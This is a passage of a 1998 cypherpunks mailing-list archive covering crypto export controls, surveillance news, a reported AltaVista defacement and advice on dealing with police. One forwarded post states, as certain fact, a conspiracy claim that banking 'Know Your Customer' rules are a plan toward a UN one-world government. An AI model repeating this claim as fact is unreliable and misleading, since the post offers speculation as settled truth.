Congressmen liable when they use American troops irresponsibly?"

        * Cancer deaths: "The federal government admitted last year
that Cold War nuclear tests exposed 230,000 Americans to high levels of
radioactive iodine, and may cause 75,000 people to develop fatal
thyroid cancer," Dasbach said. "If it's fair to force tobacco companies
to pay for smoking-related illnesses, it's fair to force the government
to pay for legislation-related illnesses -- like thyroid cancer."

        * Air-bag deaths: "According to the federal government, 49
children have been killed by government-mandated air bags," Dasbach
said. "Their grieving parents ought to file wrongful-death suits
against the Congressmen who demanded this law and the Transportation
Department bureaucrats who wrote it."

        * Alcohol-related deaths: "Eighteen state governments control
the liquor stores that operate within their borders," Dasbach said. "So
why aren't those state politicians and bureaucrats sued for the cost of
every alcohol-related car crash?"

        * Deaths caused by gun-control laws: "According to a landmark
study last year by criminologists John R. Lott and David B. Mustard,
the refusal of 24 state governments to pass concealed-carry laws caused
an additional 1,414 murders, 4,177 rapes, and 60,363 aggravated
assaults in 1992 alone," Dasbach said. "Residents of these states ought
to file an immediate injunction to prevent these victim-disarmament
laws from causing more innocent blood to be shed."

        * Deaths caused by criminals on parole: "According to
Department of Justice figures, murderers are freed from prison an
average of 11.6 years before their full sentence expires; armed robbers
are sprung 5 years early; and rapists are back on the streets 5.9 years
early," Dasbach said.

        "The politicians who handed these murderers, robbers, and
rapists get-out-of-jail-early cards -- usually so they could fill the
jails with people convicted of victimless crimes -- ought to be charged
as an accessory to every crime these violent thugs commit."

        * Gambling-related suicides: "Heavily advertised
state-sponsored lotteries siphon billions of dollars a year from
America's poor, and are directly responsible for uncountable numbers of
gambling-related bankruptcies, suicides, and broken homes," Dasbach
said. "Since politicians addicted to taxes are harming vulnerable
Americans addicted to gambling, shouldn't the state officials who run
these destructive lotteries be held personally responsible?"

        But Libertarians aren't holding their breath waiting for the
government to be brought to justice, Dasbach admitted.

        "Courts have consistently ruled that government is protected
from prosecution by the legal doctrine of sovereign immunity," he said.
"According to the courts, death-by-government programs are not against
the law.

        "But wouldn't America be a much safer country if politicians
were held to the same standard as any other individual?

        "Unfortunately, unless that happens, prosecution-proof
politicians will continue to escape the consequences of their
actions -- while hypocritically sending ordinary Americans off to
jail."


- - -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNmzhy9CSe1KnQG7RAQES5wP6Ap6aRD4XRSWEEnC+2Vz5+ix8aQg4ss+3
srlja3yDIqsh94SIo1xoIESwZ/61DEpXyvhO/PdJ0xt6wtcFWNkAGbt1VVyr26Tx
O+2Qv3NMcHq7ISSMV1SGHYuuRsCuAg/om+PU39NxNfj60eTMpEkPDz0wyAm9XFxu
3c0bMkh+0Zw=
=qedo
- - -----END PGP SIGNATURE-----

The Libertarian Party                                      http://www.lp.org/
2600 Virginia Ave. NW, Suite 100                          voice: 202-333-0008
Washington DC 20037                                         fax: 202-333-0072

For subscription changes, please mail to <announce-request@lp.org> with the
word "subscribe" or "unsubscribe" in the subject line -- or use the WWW form.



- - -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.inannareturns.com
"See God in Every Eye" --Inanna, Goddess of Love
V.S. Ferguson
author, Inanna Returns and Inanna Hyper-Luminal

- - --------------54D4A0A30C2370EF22396E74--


- ------- End of Forwarded Message


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@bigfoot.com>
Date: Wed, 9 Dec 1998 07:45:40 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Officers face suspension for email offenses: Half of Town's Police Force Involved
Message-ID: <Pine.LNX.4.02.9812081618210.3290-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain



Chief cleans house after half the Department makes fun of him via email on
Patrol Car Computer Terminals (PDC's)... 
(Plus it's a rally cool website - listen to police scanners while you read
FBI FOIA files on people like Frank Sinatra).

OAKLAND, N.J. (APB) -- Half of this small borough's police force may be
suspended for allegedly using computer terminals in their patrol cars to
send one another disrespectful comments about the chief and the borough. 

http://www.apbonline.com/911/1998/12/06/oakland1206_1.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 3umoelle@informatik.uni-hamburg.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Wed, 9 Dec 1998 00:42:04 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
In-Reply-To: <199812081346.HAA09950@einstein.ssz.com>
Message-ID: <199812081543.QAA29629@rzdspc26.informatik.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text



> Ah, so the call is for folks in Denmark to post the various pieces of
> currently available software then, not everyone on the planet as it appears.

It is not just about Denmark. The Wassenaar arrangement has been
signed by 33 countries, including the US, Canada, the European Union,
Japan, Australia, New Zealand, Norway and others. Up to now, 30 of
these states have allowed to export mass market and public domain
crypto software without a license. Only the US, France and NZ did not
have the "General Software Note".

The US has exercised extreme pressure at the Wassenaar conference (as
one German government official writes) and has managed to get the
General Software Note modified. Now the states that have signed the
arrangement will have to regulate the export of strong
cryptography. There are other places such as Brazil, Iceland, South
Africa, India, and even Singapore which do not have any export
restrictions. However, must crypto software that is distributed on the
Internet right now is distributed under General Software Note.

John Gilmore writes: "I call for volunteers in each country, at each
university or crypto-aware organization, to download crypto tools
while they can still be exported from where they are, and then to
offer them for export from your own site and your own country as long
as it's legal."                                               ^^^^^^^
^^^^^^^^^^^^^
Which is exactly what is needed in this situation.

> RSAREF is not quite what he is asking folks to do now is it.

RSAREF is what he has determined he can legally export from the US. So,
yes, he is doing what he also asks others to do.

> Let me ask you this Ulf, when is YOUR site going up?

My university is already distributing SSLeay, PGP, ssh, cfs and other
cypto tools. As long as they continue to do so, I won't make my mirror
available on the web, but my own crypto site is going up later this
week with another piece of strong crypto software.

> Your address implies you're in Denmark.

Almost. :)

> What are you going to do for YOUR liberty today? Has Gilmore agreed to
> help fund YOUR fight of the change in your courts?

Today I am going to create the distribution of the software I have
been working on in the past months, have the server set up and, if all
goes well, upload the file.

I have made a few thousand dollars on developing crypto software and I
am ready to use much of that money to defend my right to distribute
the results of my work on the web. I haven't asked John or anybody
else to help me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Dec 1998 07:26:44 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: The problem with 'Gilmore's RSAREF' site... (fwd)
Message-ID: <199812082249.QAA14262@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: The problem with 'Gilmore's RSAREF' site... (fwd)
> Date: Tue, 8 Dec 1998 14:26:52 -0800 

> > Further, he's not willing to extend his legal protection to help 
> > others.
> 
> Has there been any indication that the EFF would not support or help someone
> being persecuted for crypto-export disobedience? I wouldn't rely on such

I've asked many times from the local chapter and the answer was always no. 
The EFF has certainly never offered legal support to anyone in the 8 years
or so they've been in existance, well other than Steve Jackson perhaps (I'm
not sure if the EFF helped defray any of his court costs).

> charity, nor is charity ever obligatory (that's socialism), but what reason
> do you have to discount it?
> 
> The essence of civil disobedience is many many individual targets, not one
> organization.

You should look into the history of civil disobedience then. The ONLY time
it works is when it is done via mass involvement. The NAACP and ACLU have
been quite effective within their limited areas of interest.

Your understanding of the history of civil disobedience is skewed at best. 

> I'm am not critical of any contribution, but I will be critical of someone
> chastising others contributions simply because they would do it differently.
> A call to arms to protect liberty is not a draft. If you don't want a gun,
> then don't take it, I won't even call you a Tory.

Then you should rethink your approach. Somebody asking to put your neck on
the block while they won't with their own is no contributor. I believe back
in the War of Indipendence THOSE people were called Tory.



    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Tue, 8 Dec 1998 17:35:13 +0800
To: cypherpunks@toad.com
Subject: knapsack....
Message-ID: <Pine.GSO.3.96.981208170008.2860A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



Where could I find the algorithm (per se) for
Merkle-Hellman knapsack ?
(if it is not for free just say so) :)

I've read in Mr. Schneier's book that Chor-Rivest knapsack is secure
(unless for some specializerd attack). Is it still as secure today as the
latter years?







Bernie





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Dec 1998 09:45:36 +0800
To: cypherpunks@cyberpass.net
Subject: spy cameras
Message-ID: <199812090104.RAA19228@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message

Date:         Thu, 3 Dec 1998 09:18:29 -0500
From: Dan S <dan@SOUTHEAST.NET>
Subject:      [CTRL] Smart spy cameras on the way
To: CTRL@LISTSERV.AOL.COM

 -Caveat Lector-

>From :
http://www.telegraph.co.uk:80/et?ac=001036222020742&rtmo=VqqqD8sK&atmo=kkkkkkku&P4_FOLLOW_ON=/98/12/3/ecnspy03.html&pg=/et/98/12/3/ecnspy03.html
- -
Smart spy cameras on the way

By Patrick Hook

POLICE scientists are close to a major breakthrough that will allow CCTV
cameras to "recognise" criminal activity.

Using leading-edge neural and pattern recognition technologies,
developed for space and defence applications, scientists are confident
that it will shortly be possible to police whole areas of the country
automatically and alert the authorities to criminal activity.

Speaking at a recent London conference organised by the research and
development group SIRA, Dr Mike Taylor, head of technology operations at
Scotland Yard, said the main barrier to the development of such a system
was the quality of the images that were generally produced by existing
CCTV equipment.""It is perfectly feasible to develop software which can
distinguish certain actions, but the quality of image capture means that
it is often difficult to see exactly what is going on," he said.

"The quality is, it seems, in direct proportion to the amount of effort
that users are prepared to invest in such systems. Since its
introduction more than 20 years ago, the need for such technology has
increased, and intelligent sensory information processing and
information fusing is going to play a very key part in crime management.
The next step is to add other sensory devises such as microphones to
pick up the sound of breaking glass and sensors that can detect the
smell of particular substances and trigger an appropriate  response."

The work is part of a research programme into an area of security that
has been identified by the government's Foresight Challenge as a
priority for further study. Drawn from a range of organisations,
including the police, the Defence Evaluation and Research Agency and the
Home Office, the work of the team is being partly funded by Brussels.
Most of the research is centred on the fusing of information from
several sources to present a more accurate report of what the CCTV
camera has seen.

"The additional cost of a microphone or other sensor is not likely to be
great," said Taylor, "and should make a significant difference to the
ability of the police to detect criminal activity."

Not everyone is enthusiastic, however. John Wadham, director of Liberty,
said: "It's difficult to see how this kind of technology would work
accurately in practice. It could result in officers' time being wasted
investigating incidents - and indeed individuals - which turn out to be
entirely innocent. I do wonder whether we have enough surveillance
already. Surveillance technology is better at protecting property than
people and is still not adequately regulated to protect privacy."
- --

dan@southeast.net

DECLARATION & DISCLAIMER
==========
CTRL is a discussion and informational exchange list. Proselyzting propagandic
screeds are not allowed. Substance-not soapboxing!  These are sordid matters
and 'conspiracy theory', with its many half-truths, misdirections and outright
frauds is used politically  by different groups with major and minor effects
spread throughout the spectrum of time and thought. That being said, CTRL
gives no endorsement to the validity of posts, and always suggests to readers;
be wary of what you read. CTRL gives no credeence to Holocaust denial and
nazi's need not apply.

Let us please be civil and as always, Caveat Lector.

========================================================================
To subscribe to Conspiracy Theory Research List[CTRL] send email:
SUBSCRIBE CTRL [to:] LISTSERV@LISTSERV.AOL.COM

To UNsubscribe to Conspiracy Theory Research List[CTRL] send email:
SIGNOFF CTRL [to:] LISTSERV@LISTSERV.AOL.COM

Om

------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Glave <james@wired.com>
Date: Wed, 9 Dec 1998 09:58:05 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: Altavista hacked
In-Reply-To: <199812082203.XAA25646@replay.com>
Message-ID: <199812090113.RAA25662@hardly.hotwired.com>
MIME-Version: 1.0
Content-Type: text/plain



Good thing http://www.altavista.com/ is still up!

*grin*

At 11:03 PM 12/8/98 +0100, Anonymous wrote:
>
>It appears that www.altaviata.com has been hacked.
>
>Begin Quote:
>If you are looking for pornographic material (naked people)
>                             please Click Here 
>
>         Else please check back with us soon, we are under
>                                construction. 
>
>Thanks. 
>
>End Quote
>
>Resolving *.digital.com DNS entries seems impossible. Any ideas? Wish
>DNSsec was deployed, it might of prevented this.
> 


James Glave, News Editor, Wired News, http://www.wired.com  +1 (415) 276-8430




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Glave <james@wired.com>
Date: Wed, 9 Dec 1998 09:50:06 +0800
To: Max Inux <maxinux@bigfoot.com>
Subject: Power Outage in San Fransisco/bay area
In-Reply-To: <Pine.LNX.4.02.9812081311290.1412-100000@khercs.chipware.net>
Message-ID: <199812090115.RAA25822@hardly.hotwired.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.wired.com/news/news/technology/story/16710.html

SF Blackout: Y2K Dress Rehearsal
by Chris Oakes and Craig Bicknell , Wired News

12:40 p.m.  8.Dec.98.PST
When the lights went out Tuesday on nearly 1 million San Francisco Bay Area
residents, the blackout served as a warning of what might happen in a
society dependent upon electricity for basic services and commerce.

"This could very well be a reflection of a Y2K disaster that's not properly
managed," said Nancy Wong, a spokeswoman for the US Critical Infrastructure
Assurance Office. 

"It's another reminder of how tremendously dependent everyone is on power,"
added Peter Neumann, a critical infrastructure expert and the author of the
book Computer Related Risks. 

"It's kind of a harbinger of the Year 2000 problem. We're in practice mode
right now." 

....more....


James Glave, News Editor, Wired News, http://www.wired.com  +1 (415) 276-8430




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: b!X <bix@geekforce.org>
Date: Wed, 9 Dec 1998 09:45:16 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Altavista hacked
In-Reply-To: <199812082203.XAA25646@replay.com>
Message-ID: <Pine.LNX.3.93.981208172057.12163A-100000@millennium-cafe.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 8 Dec 1998, Anonymous wrote:

# It appears that www.altaviata.com has been hacked.

*yawn*


- b!X (Guerrilla Techno-fetishist)
      (Global Effort to Eradicate Know-nothings)
      (Operation Primate Purge - http://www.geekforce.org/field/purge.shtml)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 9 Dec 1998 01:30:05 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
In-Reply-To: <199812080331.VAA07823@einstein.ssz.com>
Message-ID: <366D53CB.A2B7AAAC@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



John Young wrote:
> 
> In response to John Gilmore's call for a foil to US-Wassenaar
> restrictions acoming, we've put up a preliminary list of international
> cryptography sources for mirroring:
> 
>    http://jya.com/crypto-free.htm
> 
> This is a quick starter-kit and is far from comprehensive.
> Contributions welcome.

For longer term it might be desirable to have a site in a crypto-
politics neutral country (one that is unlikely to have crypto laws
in foreseeable future) to which software could be uploaded.
Downloading is then import and not subject to restriction.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@idt.net>
Date: Wed, 9 Dec 1998 07:26:25 +0800
To: ichudov@Algebra.COM (Igor Chudov)
Subject: Re: I Got Mine
In-Reply-To: <199812081757.MAA06069@mail1.panix.com>
Message-ID: <3.0.1.32.19981208173418.0072b52c@pop3.idt.net>
MIME-Version: 1.0
Content-Type: text/plain



At 12:07 PM 12/8/98 -0600, Igor Chudov @ home wrote:
>I apologize for my ignorance. I am not very well aware of this Heinlein
>fellow.
>
>What I am looking for is a practical guide book on how to deal with
>cops and other law enforcement/jackbooted thug types, in the manner
>that minimizes my long term damage. Something along the lines of "You
>and the Police!", by Boston T. Party, a book that I greatly enjoyed.
>
There is some general information about what to do if stopped by the police
at the ACLU site:

www.aclu.org

In addition to the good advice that was given on this list to keep your
mouth shut, I would like to comment on someone's earlier (several days ago)
post. He had commented that the subject of spoofed messages came up in a
discussion with an agent, and the agent asked about what this term meant.
Don't let them draw you into such a discussion. They probably know damn
well what these terms mean, they want to hear what you say they mean. You
are being mind probed.

Be polite, don't let them get you to say something angry or stupid, and say
nothing more than civil response requires.

Jay




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Dec 1998 10:32:34 +0800
To: cypherpunks@cyberpass.net
Subject: [CTRL] Feds And FDIC To Monitor All Your Personal Financial Activities
Message-ID: <199812090136.RAA21868@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: DrErebus@AOL.COM
Subject: [CTRL] Feds And FDIC To Monitor All Your Personal Financial Activities
Date: Sun, 6 Dec 1998 10:11:25 EST
To: CTRL@LISTSERV.AOL.COM

 -Caveat Lector-

Feds And FDIC To Monitor
All Your Personal Financial Activities

12-1-98






The following is direct quote from the first page of FDIC document (6174-01)
(12 CFR Part 326) Notice of proposed rulemaking.

"SUMMARY: The FDIC is proposing to issue a regulation requiring insured
nonmember banks to adopt and maintain "Know Your Customer" programs. As
proposed, the regulation would require each nonmember bank to develop a
program designed to determine the identity of its customers; determine its
customers' sources of funds; determine the normal and expected transactions of
its customers; monitor account activity for transactions that are inconsistent
with those normal and expected transactions; and report any transactions of
its customers that are determined to be suspicious, in accordance with the
FDIC's existing suspicious activity reporting regulation. ---"


The things to be very concerned about in this case are the PROFILE PARAMETERS
that in turn define the various limits that when exceed, qualify as an
exception to the norm and thus must be reported to another federal agency, as
a suspicious transaction. There is virtually no limit to the number or type of
profile parameters that can be established. For example, is the customer an 8
foot tall white male weighing in excess of 400 pounds or is the customer a
four foot tall black female weighing less than 90 pounds. The question or
questions (and there are many questions) then becomes, who will be responsible
for establishing, defining and controlling the limitless number of possible
profile parameters? Who will be responsible for adding, changing and deleting
established profile parameters? Who will be responsible for insuring that this
awesome and massive capability will not be misused and abused by the various
departments of the Federal Government. In other words, is the 8 foot tall
white male an exception to the norm or is the 4 foot tall black female the
exception or, are both the upper limit and the lower limit considered as an
exception to the norm. How about all those in between?

As noted in the quoted SUMMARY of the document identified above, the "key
operative statements" are as follows;

1. Identify its customers. 2. Determine its customers' source of funds. 3.
Determine the normal and expected transactions of its customers. 4. Monitor
account activity for transactions that are inconsistent with those normal and
expected transactions. 5. Report any transactions of its customers that are
determined to be suspicious ---.

Before we briefly examine the five individual requirements noted above, and so
that you will understand where"I" am coming from, please be aware of the fact
that, in addition to being a Baptist Preacher, I have been a Data Processing
Systems Analyst for some 48+ years. At least half of that time was spent
working for the Federal Government, designing and installing total Data
Processing Facilities, from the Presidents Battle Staff, to the Congress, to
the Department of defense, to the local Church name and address data base. I
have written and taught several college courses: (a) Management of Data
Processing Facilities and (b) Systems Analysis. One of the first things that I
always tell the new students in my Systems Analysis class is "In the field of
electronic data processing, your only limitation is you own imagination. If
you can rationalize it in your mind, 'electronic' data processing can do it."

Now, given that background and qualifications let me tell you, in no uncertain
terms, -- I know exactly what the Federal Government is up to. I know exactly
what information they are looking for; I know exactly how to get that
information and I know exactly how they plan to eventually use that
information.

Requirement # 1: Identify its customers. I have no problem with this
requirement so long as that identifying information is limited to name,
mailing address and an account number generated by the "local" financial
institution and assigned to a particular account to provide unique
identification, but absolutely nothing more.

Requirement # 2: Determine its customers' source of funds. This I have a BIG
problem with. Even though the government would like for you to believe that
this requirement is related to identifying "possible" illegal money laundering
by drug traffickers, that is not the only reason they want to know the source
of your finances. Remember now, the ultimate objective of the vast majority of
government regulations and programs are directed at controlling the
"individual." This item required that you advise the bank of all the sources
that you will be receiving money from that you will be depositing in this
particular account. We will expand this item in more detail below.

Requirement # 3. Determine the normal and expected transactions of its
customers. For purposed of this discussion we will consider only four primary
parameters related to deposits and withdrawals against this particular
account.

First: When you established a new checking account you will be required to
identify the number of deposits you expect to make each month and the average
amount of each deposit. For example (a) military retirement pay = $2,000.00,
(b) Social Security Income = $400.00, (c) Rent from income property = $750.00,
(d) Interest from stocks & bonds = $ 300.00, and so on.

Second: You will be required to identify the number of withdrawals you expect
to make each month from this account and the estimated amount of each
withdrawal. For example; (a) Mortgage payment=$ 800.00, (b) Car Payment =
$250.00, (c) College tuition = $ 1,000.00).

Once the average number of deposits and the average amount of each deposit has
been determined and the average number of withdrawals and the average amount
of each withdrawal has been established, it will be very easy to identify all
transactions, in and out, that exceed the established norms for this
particular account. For example should you find a paper bag on the side of the
highway containing 10,000 well used one dollar bills, or Aunt Sue passed away
and left you 10,000 well used one dollar bills and you deposited that windfall
in your checking or savings account, that would immediately be detected as
exceeding the established norms for your account.

Requirement # 4. Monitor account activity for transactions that are
inconsistent with those normal and expected transactions. This requirement
establishes the requirement that each financial institution establish a
procedure to monitor your financial accounts on a regular basis for any
transactions that exceed the established norms as illustrated above.

Requirement # 5. Report any transactions of its customers that are determined
to be suspicious ---. This requirement requires that all financial
institutions immediately report any and all suspicious transactions detected
as a result of deposits or withdrawals that exceed the established norms for
your account.

As I was reviewing the aforementioned FDIC document, as quoted above, I called
a long time friend of mine who is vice president of a local bank that I do
business with. I ask my vice president friend to identify the government
agency(s) to which he would report such a suspicious transaction. His response
was, the IRS and the FBI, at the national level.

My friends, as a long time ADP/EDP Systems Analyst I want you to pay
particular attention to the following.

Whenever a good and successful Information (Data) Processing Systems Analyst
designs a large scale information processing system, such as what we have been
talking about above, he will ALWAYS allow for future expansion of "existing"
applications and processing capabilities and his design work will also allow
for "additional" applications and processing capabilities to be added with a
minimum of additional effort and cost.

Based on my 48+ plus years in the business, let me tell you what you can
expect in the very near future if the proposed "rulemaking" provisions as
defined in the FDIC document identified above are allowed to be implemented.
Please, read the following very carefully because it lays out the route our
government is taking toward a cashless society as required by the design of a
one world government under the United Nations.

1. PRESENTLY ALL recipients of military retirement pay MUST have a bank
account into which their monthly retirement pay is electronically transferred.
The government will no longer pay individual retirees directly, or send their
retirement pay to a home address. This is part of an over all plan to extended
more absolute control over the individual. It has absolutely nothing to do
with economy as the government would have you to believe.

2. In the very near future look for legislation that will "require" ALL
government employees, federal, state and local, to have a bank account into
which their salary will also be electronically transferred, just like the
retired military. In as much as most government employees already have the
direct deposit option available, it requires only vary simple legislation to
complete this phase of the plan.

3. Next you will see legislation that will outlaw the direct payment of all
wages or salaries to any individual, by an employer. All employees who work
for a wage or salary, will also be required to have a bank account into which
the employer will be required to direct deposit their salary. And once again
the legislation necessary to accomplish phase of the plan is very simple and
easy to implement, simply because most business would welcome the reduced
payroll cost. The governments objective here is to eventually make the local
financial institution the only source of legal tender for the individual. At
this point and for the purpose of this paper, legal tender is defined as
dollars, debit cards or other credit cards. When objectives 2 & 3 above have
been fully accomplished, it will then be a very simple matter to implement the
rest of the plan.

Let me explain it this way. The total plan equates to $1.00 (One dollar) When
steps 2 & 3 have been fully implemented, as step 1 has already been
accomplished, that will equate to $ .95 cents of that $1.00. The rest of the
plan equates to only 5 cents out of that one dollar. And just what is the rest
of the plan? It's very simple.

After steps 1, 2 and 3 as noted above have been fully implemented, the only
thing left to do then would be to outlaw all cash transactions and require all
transactions now involving cash, be accomplished through the use of checks or
smart cards followed by the eventual elimination of the checks.

At that point the federal government can then trace, track AND CONTROL ALL
TRANSACTIONS, simply because all transactions will then be processed by
massive computer systems controlled by the federal government. Given the above
accomplishments and current electronic capabilities, the ability to exercise
absolute control over "individuals" provided by the additional five cents
noted above are absolutely mind boggling. There are many, many more reasons
that all Americans should and must oppose implementation of the five (5)
requirements identified above. There are TWO things that every American should
do, immediately. First: All Americans should send a letter to the FDIC
expressing their STRONG objection and opposition to the plan to PROFILE
individual bank accounts for what ever purpose. The FDIC will be accepting
public comments until December 27. Send your comments to:

Robert E. Feldman, Executive Secretary Attention: Comments/OES, FDIC 550 17th
Street, NW Washington, DC 20429

---

Spectre <temporal@earthlink.net
12-3-98


Hi Jeff:

Found this site about the new FDIC "Know your Customer" regulations:
http://www.bankinfo.com/compliance/newkyc.html

Seems to me the laws and regulations can be interpreted to mean a lot and I
wouldn't completely discount the article you posted on your web page as a
complete hoax, if you read the article.:

PARTS from that page below:

" By requiring banking organizations to determine the true identity of their
customers, as well as to obtain knowledge regarding the legitimate activities
of their customers, the proposed regulations will reduce the likelihood that
banking organizations will become unwitting participants in illicit activities
conducted or attempted by their customers."

"While it is impossible to identify every transaction at a financial
institution that is potentially illegal or is being conducted to assist
criminals in the movement of illegally derived funds, it is fundamental for
safe and sound operations that financial institutions take every reasonable
measure to identify their customers, understand the legitimate transactions to
be conducted by those customers and, consequently, identify those transactions
conducted by their customers that are unusual or suspicious in nature. By
identifying and, when appropriate, reporting such transactions, in accordance
with existing suspicious activity reporting requirements, financial
institutions are protecting their integrity and are assisting the efforts of
the bank regulatory agencies and law enforcement authorities to thwart illicit
activities at financial institutions."

"The Board has long advocated that one of the most effective means by which a
financial institution can both protect itself from engaging in transactions
designed to facilitate illicit activities and ensure compliance with
applicable suspicious activity reporting requirements is for the institution
to have adequate "Know Your Customer" policies and procedures"

"In the Board's view, a financial institution should take the necessary and
reasonable steps to determine the true identity of its customers, their
sources of funds, and their normal and expected transactions and to identify
unusual or suspicious activities".
------



Please excuse my distress, but often times the best-intentioned people are
quick to jump and call something a "Hoax," which unfortunately misleads
people, when just the opposite is true. Being very familiar with legal
research, it was simple for me to determine if the the e-mail sent to you by
Mr. Gene Ingram [gene@cup.hp.com] declaring the post the "Feds and FDIC to
Monitor All Your Personal Financial Activities" a hoax; and to see if Mr.
Ingram was presumptively correct in his analysis.

The most impmrtant point you should know it was stated in the beginning of the
article in re the "Feds and FDIC" that this was a *proposed rule* being
submitted by the FDIC "...requiring insured nonmember banks to adopt and
maintain "Know Your Customer" programs." ALL proposed rules submitted by any
federal agency must first be sent to the Federal Register for publication
under the *notice* rules.

>From the wording of this "Sunshing Act Meeting" chaired by the Board of
Governors for the Federal Reserve System, the FDIC is "only following orders."
Please find below a replica of the *notice*:
________________________________________________________________
[Federal Register: September 28, 1998 (Volume 63, Number 187)]
[Notices]
[Page 51579]
>From the Federal Register Online via GPO Access
[http://www.wais.access.gpo.gov]
[DOCID:fr28se98-60]

-----------------------------------------------------------------------

FEDERAL RESERVE SYSTEM


Sunshine Act Meeting

Agency Holding the Meeting: Board of Governors of the Federal Reserve System.

Time and Date: 10:00 a.m., Thursday, October 1, 1998.

Place: Marriner S. Eccles Federal Reserve Board Building, C Street entrance
between 20th and 2lst Streets, N.W., Washington, D.C. 20553.

Status: Open.

Matters to be Considered: Summary Agenda: Because of its routine nature, no
discussion of the following item is anticipated. This matter will be voted on
without discussion unless a member of the Board requests that the item be
moved to the discussion agenda.

1. Publication for comment of proposed amendments to Regulation H (Membership
of State Banking Institutions in the Federal Reserve Qystem), Regulation K
(International Banking Operations), and Regulation Y (Bank Holding Companies
and Change in Bank Control) to require domestic and foreign banking
organizations to develop and maintain ``Know Your Customer'' programs. 2. Any
items carried forward from a previously announced meeting.

Discussion Agenda: None. No Discussion Items Are Scheduled For This Meeting.

Note: If an item is moved from the Summary Agenda to the Discussion Agenda,
discussion of the item will be recorded. Cassettgs will then be available for
listening in the Board's Freedom of Information Office, and copies can be
ordered for $6 per cassette by calling 202-452-3684 or by writing to: Freedom
of Information Office, Board of Governors of the Federal Reserve System,
Washington, D.C. 20551.

Contact Person for More Information: Lynn S. Fox, Assistant to the Board;
202-452-3204.

Supplementary Information: You may call 202-452-3006 for a recorded
announcement of this meeting; or you may contact the Board's Web site at
http://www.federalreserve.gov for an electronic announcement. (The Web site
also includes procedural and other information about the open meeting.)

Dated: September 24, 1998. Robert deV. Frierson, Associate Secretary of the
Board. [FR Doc. 98-25960 Filed 9-24-98; 11:19 am] BILLING CODE 6210-01-P
___________________________________________________________

The rule[s] will not be published in the Code of Federal Regulations (CFR)
until the proposed rule[s] is finalized. These rule changes will be to
Regulations H, K and Y pertaining to Banking administration procedures. The
proposed changes *may* be all inclusive within 12 CFR 326 - I wouldn't begin
to guess until the final rules are drafted. Perhaps this is the reason why Mr.
Ingram was unable to find what he was looking for. In the interim, I suggest
caution, research and a thoroughly checking your sources before labeling
anything a *Hoax* or stating something as fact if you don't know first hand or
from personal experience.

If anything, the obvious fact this determination was dictated by the Board of
Governors of the Federal Reserve System ...well, I'll leave that to your
readers to decide the relevancy or merit of the Board's decree.

If you would like additional information, please feel free to contact me.

Lynn Shaffer
fadaar@psn.net

DECLARATION & DISCLAIMER
==========
CTRL is a discussion and informational exchange list. Proselyzting propagandic
screeds are not allowed. Substance-not soapboxing!  These are sordid matters
and 'conspiracy theory', with its many half-truths, misdirections and outright
frauds is used politically  by different groups with major and minor effects
spread throughout the spectrum of time and thought. That being said, CTRL
gives no endorsement to the validity of posts, and always suggests to readers;
be wary of what you read. CTRL gives no credeence to Holocaust denial and
nazi's need not apply.

Let us please be civil and as always, Caveat Lector.

========================================================================
To subscribe to Conspiracy Theory Research List[CTRL] send email:
SUBSCRIBE CTRL [to:] LISTSERV@LISTSERV.AOL.COM

To UNsubscribe to Conspiracy Theory Research List[CTRL] send email:
SIGNOFF CTRL [to:] LISTSERV@LISTSERV.AOL.COM

Om




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Dec 1998 08:17:47 +0800
